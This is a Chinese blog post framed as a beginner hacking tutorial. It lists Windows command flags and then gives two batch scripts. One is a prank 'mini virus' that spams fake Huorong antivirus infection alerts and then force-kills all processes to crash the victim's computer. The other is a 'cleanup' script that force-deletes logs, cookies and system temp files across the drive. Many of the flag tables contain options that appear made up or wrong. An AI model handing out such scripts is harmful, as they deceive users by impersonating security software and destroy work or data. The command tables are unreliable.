黑客攻防教程(1)：windows 基本操作

最新推荐文章于 2024-11-04 21:48:47 发布

AICodeThunder

最新推荐文章于 2024-11-04 21:48:47 发布

阅读量609

点赞数 23

文章标签： windows

本文链接：https://blog.csdn.net/joe_g12345/article/details/138818585

版权

windows 基本操作

一、功能全家桶
二、黑客玩具
- 1. 垃圾清理
- 2. 迷你病毒

一、功能全家桶

1. windows 操作

1.1 shutdown

shutdown：停止工作，关机。

参数	意义
`-a`	取消计划的关机
`-b`	立刻重新启动计算机
`-c`	指定关机理由
`-d`	指定关机理由代码和文本描述
`-e`	显示关机理由和评论
`-f`	关闭所有正在运行的程序
`-h`	关机并停止计算机的电源
`-i`	显示远程关机对话框
`-k`	发送关机警告消息给网络上的计算机
`-l`	注销当前用户并返回登录屏幕
`-m`	远程关机指定的计算机
`-p`	立刻关机
`-r`	关机并重新启动计算机
`-s`	关闭计算机
`-t`	设置关机操作的延迟时间
`-u`	取消计划的关机操作
`-v`	显示详细信息，包括计划关机的时间和消息
`-x`	立即关闭计算机并且不进行警告和确认
`-y`	关闭计算机前不需要确认
`-z`	暂停计划的关机操作

1.2 reg

reg：操作 Windows 注册表。

参数	意义
`add`	添加新的注册表项和值
`delete`	删除注册表项和值
`copy`	复制注册表项和值
`query`	显示注册表项和值
`export`	将指定的注册表项导出到文件
`import`	将保存的注册表项从文件导入
`load`	将注册表的某个部分加载到一个新的键
`unload`	将已加载的注册表部分卸载

2. 进程、文件操作

2.1 taskkill

taskkill：进程终止工具。

参数	意义
`/F`	强制终止进程，不弹出确认提示框
`/FI <过滤器>`	使用过滤器筛选要终止的进程
`/IM <进程名>`	终止与指定进程名匹配的进程
`/PID <进程ID>`	终止与指定进程 `ID` 匹配的进程
`/T`	终止指定进程及其子进程
`/ABOVENORMAL`	终止高于正常优先级的进程
`/BELOWNORMAL`	终止低于正常优先级的进程
`/HIGH`	终止高优先级的进程
`/LOW`	终止低优先级的进程
`/REALTIME`	终止实时优先级的进程
`/IM <进程名1> /IM <进程名2> /IM <进程名3>...`	终止与指定进程名匹配的多个进程
`/PID <进程ID1> /PID <进程ID2> /PID <进程ID3>...`	终止指定的多个进程
`/S <计算机名>`	在指定的远程计算机上执行操作
`/U <用户名> /P <密码>`	使用指定的用户名和密码连接到远程计算机
`/NODE <计算机名>`	在指定的计算机节点上执行操作
`/M <计算机名>`	终止指定计算机上的所有进程
`/IM <进程名> /FI <过滤器>`	根据进程名和过滤器筛选要终止的进程
`/PID <进程ID> /FI <过滤器>`	根据进程ID和过滤器筛选要终止的进程

2.2 start

start：启动程序，打开文件。

参数	意义
`/D <目录路径>`	指定程序所在的目录路径
`/I`	用于运行程序以便修改关联设置
`/MAX`	最大化窗口
`/MIN`	最小化窗口
`/SEPARATE`	在新的窗口中启动16位程序
`/SHARED`	在新的进程中启动程序
`/WAIT`	等待程序退出
`/B`	在新的窗口中启动程序，但不激活窗口

2.3 xcopy

xcopy：复制文件和目录。

参数	意义
`/s`	复制目录和子目录中的文件
`/e`	复制目录和子目录中的文件，包括空目录
`/i`	如果目标为目录而非文件时，要求确认
`/y`	不提示确认，直接复制
`/d`	仅复制源文件较新或目标文件不存在的文件
`/c`	继续复制，即使出现错误
`/r`	如果文件只读，将其复制为非只读
`/h`	复制隐藏文件和系统文件
`/k`	复制文件属性，如只读、隐藏、系统和存档
`/f`	显示复制的文件和目录名称
`/v`	验证每个文件的复制
`/t`	仅复制目录结构（不复制文件）
`/exclude:<文件>`	指定排除列表中的文件
`/exclude+:<文件>`	指定包含列表中的文件
`/excludefile:<文件>`	指定包含和排除列表文件

2.4 del

del：删除文件。

参数	意义
`/p`	每次删除前提示确认
`/f`	强制删除，不提示确认
`/s`	删除指定目录及其子目录中的文件
`/q`	安静模式，不显示删除的文件信息

3. 目录操作

3.1 mkdir

mkdir：创建目录。

参数	意义
`/p`	创建目录时，如果上级目录不存在，则同时创建上级目录
`/v`	显示创建的目录路径

3.2 rmdir

rmdir：删除目录。

参数	意义
`/s`	删除指定目录及其子目录
`/q`	安静模式，不显示删除的目录信息

3.3 move

move：移动文件和目录。

参数	意义
`/y`	不提示确认，直接移动
`/-y`	提示确认，需要确认后才能移动
`/s`	移动当前目录及其子目录中的文件
`/-s`	仅移动当前目录中的文件，不包括子目录
`/i`	如果目标为目录而非文件时，要求确认
`/-i`	如果目标为目录而非文件时，不要求确认
`/v`	显示移动的文件和目录名称
`/-v`	不显示移动的文件和目录名称

4. 黑客基础操作

4.1 ping

ping：测试网络连接、延迟等待。

参数	意义
`-t`	持续进行Ping直到手动停止
`-n <次数>`	指定Ping的次数
`-w <超时时间>`	指定等待每次回复的超时时间（毫秒）
`-l <数据包大小>`	设置发送数据包的大小（字节）
`-4`	强制使用IPv4地址
`-6`	强制使用IPv6地址

4.2 ipconfig

ipconfig：显示、修改 IP 配置信息。

参数	意义
`/all`	显示详细的IP配置信息
`/release`	释放指定的适配器的IP地址
`/renew`	更新指定适配器的IP地址
`/flushdns`	清除DNS缓存记录
`/registerdns`	刷新DNS客户端的注册表记录
`/displaydns`	显示DNS缓存中的内容
`/showclassid`	显示指定适配器的DHCP类标识符设备ID
`/setclassid`	修改指定适配器的DHCP类标识符设备ID

二、黑客玩具

1. 垃圾清理

@echo off
msg * 正在清理系统垃圾文件，请稍候...
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
rd /s /q %windir%\temp & md %windir%\temp
msg * 清理完成！
pause

清除系统驱动器下的临时文件、视频缓存文件、日志文件、GUID 文件、校验文件、旧版文件，回收站中的所有文件，Windows 系统目录下的备份文件，系统预读取文件夹中的文件，Cookies 和最近使用文件夹中的文件，Internet 临时文件和用户临时文件夹中的所有文件。

重建 Windows 临时文件夹并清空，防止找不到放存临时文件的地方。

2. 迷你病毒

REM 嚯嚯，去整整讨厌的人吧（开个玩笑哈）
@echo off
setlocal

set "message=火绒提示：windows防火墙过期，请及时更新。"
set "cnt=0"

REM 弹窗100次
:loop
if %cnt%==100 goto end

msg * "%message%"
set /a cnt+=1
goto loop

:end

msg * "火绒提示：识别有强病毒。"
timeout /t 5
msg * "火绒提示：已减缓侵入。"
timeout /t 5
msg * "火绒提示：清理残留中…"
timeout /t 5
msg * "火绒提示：已识别出蓝屏病毒。努力清理中…"

REM 蓝屏
taskkill -f -fi "pid ne 1"